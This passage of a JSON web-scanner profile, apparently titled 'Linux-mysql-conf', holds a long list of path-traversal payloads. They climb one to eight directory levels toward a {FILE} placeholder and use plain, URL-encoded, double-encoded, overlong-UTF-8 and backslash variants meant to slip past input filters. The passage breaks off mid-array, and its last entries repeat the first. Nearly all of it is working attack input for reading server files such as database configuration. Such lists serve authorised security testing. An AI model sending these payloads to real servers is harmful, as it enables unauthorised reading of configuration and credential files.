[
  {
    "ProfileName": "Linux-mysql-conf",
    "Name": "",
    "Enabled": true,
    "Scanner": 1,
    "Author": "@Sy3Omda",
    "Payloads": [
      "true,../{FILE}",
      "true,../../{FILE}",
      "true,../../../{FILE}",
      "true,../../../../{FILE}",
      "true,../../../../../{FILE}",
      "true,../../../../../../{FILE}",
      "true,../../../../../../../{FILE}",
      "true,../../../../../../../../{FILE}",
      "true,..%2f{FILE}",
      "true,..%2f..%2f{FILE}",
      "true,..%2f..%2f..%2f{FILE}",
      "true,..%2f..%2f..%2f..%2f{FILE}",
      "true,..%2f..%2f..%2f..%2f..%2f{FILE}",
      "true,..%2f..%2f..%2f..%2f..%2f..%2f{FILE}",
      "true,..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}",
      "true,..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}",
      "true,%2e%2e/{FILE}",
      "true,%2e%2e/%2e%2e/{FILE}",
      "true,%2e%2e/%2e%2e/%2e%2e/{FILE}",
      "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
      "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
      "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
      "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
      "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
      "true,%2e%2e%2f{FILE}",
      "true,%2e%2e%2f%2e%2e%2f{FILE}",
      "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
      "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
      "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
      "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
      "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
      "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
      "true,..%252f{FILE}",
      "true,..%252f..%252f{FILE}",
      "true,..%252f..%252f..%252f{FILE}",
      "true,..%252f..%252f..%252f..%252f{FILE}",
      "true,..%252f..%252f..%252f..%252f..%252f{FILE}",
      "true,..%252f..%252f..%252f..%252f..%252f..%252f{FILE}",
      "true,..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}",
      "true,..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}",
      "true,%252e%252e/{FILE}",
      "true,%252e%252e/%252e%252e/{FILE}",
      "true,%252e%252e/%252e%252e/%252e%252e/{FILE}",
      "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
      "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
      "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
      "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
      "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
      "true,%252e%252e%252f{FILE}",
      "true,%252e%252e%252f%252e%252e%252f{FILE}",
      "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
      "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
      "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
      "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
      "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
      "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
      "true,..\\{FILE}",
      "true,..\\..\\{FILE}",
      "true,..\\..\\..\\{FILE}",
      "true,..\\..\\..\\..\\{FILE}",
      "true,..\\..\\..\\..\\..\\{FILE}",
      "true,..\\..\\..\\..\\..\\..\\{FILE}",
      "true,..\\..\\..\\..\\..\\..\\..\\{FILE}",
      "true,..\\..\\..\\..\\..\\..\\..\\..\\{FILE}",
      "true,..%255c{FILE}",
      "true,..%255c..%255c{FILE}",
      "true,..%255c..%255c..%255c{FILE}",
      "true,..%255c..%255c..%255c..%255c{FILE}",
      "true,..%255c..%255c..%255c..%255c..%255c{FILE}",
      "true,..%255c..%255c..%255c..%255c..%255c..%255c{FILE}",
      "true,..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}",
      "true,..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}",
      "true,..%5c..%5c{FILE}",
      "true,..%5c..%5c..%5c{FILE}",
      "true,..%5c..%5c..%5c..%5c{FILE}",
      "true,..%5c..%5c..%5c..%5c..%5c{FILE}",
      "true,..%5c..%5c..%5c..%5c..%5c..%5c{FILE}",
      "true,..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}",
      "true,..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}",
      "true,%2e%2e\\{FILE}",
      "true,%2e%2e\\%2e%2e\\{FILE}",
      "true,%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
      "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
      "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
      "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
      "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
      "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
      "true,%2e%2e%5c{FILE}",
      "true,%2e%2e%5c%2e%2e%5c{FILE}",
      "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
      "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
      "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
      "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
      "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
      "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
      "true,%252e%252e\\{FILE}",
      "true,%252e%252e\\%252e%252e\\{FILE}",
      "true,%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
      "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
      "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
      "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
      "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
      "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
      "true,%252e%252e%255c{FILE}",
      "true,%252e%252e%255c%252e%252e%255c{FILE}",
      "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
      "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
      "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
      "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
      "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
      "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
      "true,..%c0%af{FILE}",
      "true,..%c0%af..%c0%af{FILE}",
      "true,..%c0%af..%c0%af..%c0%af{FILE}",
      "true,..%c0%af..%c0%af..%c0%af..%c0%af{FILE}",
      "true,..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}",
      "true,..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}",
      "true,..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}",
      "true,..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}",
      "true,%c0%ae%c0%ae/{FILE}",
      "true,%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}",
      "true,%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}",
      "true,%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}",
      "true,%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}",
      "true,%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}",
      "true,%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}",
      "true,%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}",
      "true,%c0%ae%c0%ae%c0%af{FILE}",
      "true,%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}",
      "true,%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}",
      "true,%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}",
      "true,%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}",
      "true,%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}",
      "true,%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}",
      "true,%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}",
      "true,..%25c0%25af{FILE}",
      "true,..%25c0%25af..%25c0%25af{FILE}",
      "true,..%25c0%25af..%25c0%25af..%25c0%25af{FILE}",
      "true,..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}",
      "true,..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}",
      "true,..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}",
      "true,..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}",
      "true,..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}",
      "true,%25c0%25ae%25c0%25ae/{FILE}",
      "true,%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}",
      "true,%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}",
      "true,%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}",
      "true,%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}",
      "true,%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}",
      "true,%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}",
      "true,%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}",
      "true,%25c0%25ae%25c0%25ae%25c0%25af{FILE}",
      "true,%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}",
      "true,%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}",
      "true,%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}",
      "true,%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}",
      "true,%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}",
      "true,%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}",
      "true,%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}",
      "true,..%c1%9c{FILE}",
      "true,..%c1%9c..%c1%9c{FILE}",
      "true,..%c1%9c..%c1%9c..%c1%9c{FILE}",
      "true,..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}",
      "true,..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}",
      "true,..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}",
      "true,..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}",
      "true,..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}",
      "true,%c0%ae%c0%ae\\{FILE}",
      "true,%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}",
      "true,%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}",
      "true,%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}",
      "true,%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}",
      "true,%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}",
      "true,%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}",
      "true,%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}",
      "true,%c0%ae%c0%ae%c1%9c{FILE}",
      "true,%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}",
      "true,%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}",
      "true,%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}",
      "true,%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}",
      "true,%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}",
      "true,%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}",
      "true,%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}",
      "true,..%25c1%259c{FILE}",
      "true,..%25c1%259c..%25c1%259c{FILE}",
      "true,..%25c1%259c..%25c1%259c..%25c1%259c{FILE}",
      "true,..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}",
      "true,..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}",
      "true,..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}",
      "true,..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}",
      "true,..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}",
      "true,%25c0%25ae%25c0%25ae\\{FILE}",
      "true,%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}",
      "true,%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}",
      "true,%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}",
      "true,%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}",
      "true,%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}",
      "true,%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}",
      "true,%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}",
      "true,%25c0%25ae%25c0%25ae%25c1%259c{FILE}",
      "true,%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}",
      "true,%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}",
      "true,%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}",
      "true,%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}",
      "true,%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}",
      "true,%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}",
      "true,%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}",
      "true,..%%32%66{FILE}",
      "true,..%%32%66..%%32%66{FILE}",
      "true,..%%32%66..%%32%66..%%32%66{FILE}",
      "true,..%%32%66..%%32%66..%%32%66..%%32%66{FILE}",
      "true,..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}",
      "true,..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}",
      "true,..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}",
      "true,..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}",
      "true,%%32%65%%32%65/{FILE}",
      "true,%%32%65%%32%65/%%32%65%%32%65/{FILE}",
      "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
      "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
      "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
      "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
      "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
      "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
      "true,%%32%65%%32%65%%32%66{FILE}",
      "true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}",
      "true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}",
      "true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}",
      "true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}",
      "true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}",
      "true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}",
      "true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}",
      "true,..%%35%63{FILE}",
      "true,..%%35%63..%%35%63{FILE}",
      "true,..%%35%63..%%35%63..%%35%63{FILE}",
      "true,..%%35%63..%%35%63..%%35%63..%%35%63{FILE}",
      "true,..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}",
      "true,..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}",
      "true,..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}",
      "true,..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}",
      "true,%%32%65%%32%65/{FILE}",
      "true,%%32%65%%32%65/%%32%65%%32%65/{FILE}",
      "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
      "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
      "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
      "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
      "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
      "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
      "true,%%32%65%%32%65%%35%63{FILE}",
      "true,%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}",
      "true,%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}",
      "true,%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}",
      "true,%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}",
      "true,%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}",
      "true,%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}",
      "true,%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}",
      "true,../{FILE}",
      "true,../../{FILE}",
      "true,../../../{FILE}",
      "true,../../../../{FILE}",
      "true,../../../../../{FILE}",
      "true,../../../../../../{FILE}",
      "true,../../../../../../../{FILE}",
      "true,../../../../../../../../{FILE}",
      "true,..%2f{FILE}",
      "true,..%2f..%2f{FILE}",
      "true,..%2f..%2f..%2f{FILE}",
      "true,..%2f..%2f..%2f..%2f{FILE}",
      "true,..%2f..%2f..%2f..%2f..%2f{FILE}",
      "true,..%2f..%2f..%2f..%2f..%2f..%2f{FILE}",
      "true,..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}",
      "true,..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}",
      "true,%2e%2e/{FILE}",
      "true,%2e%2e/%2e%2e/{FILE}",
      "true,%2e%2e/%2e%2e/%2e%2e/{FILE}",
      "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
      "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
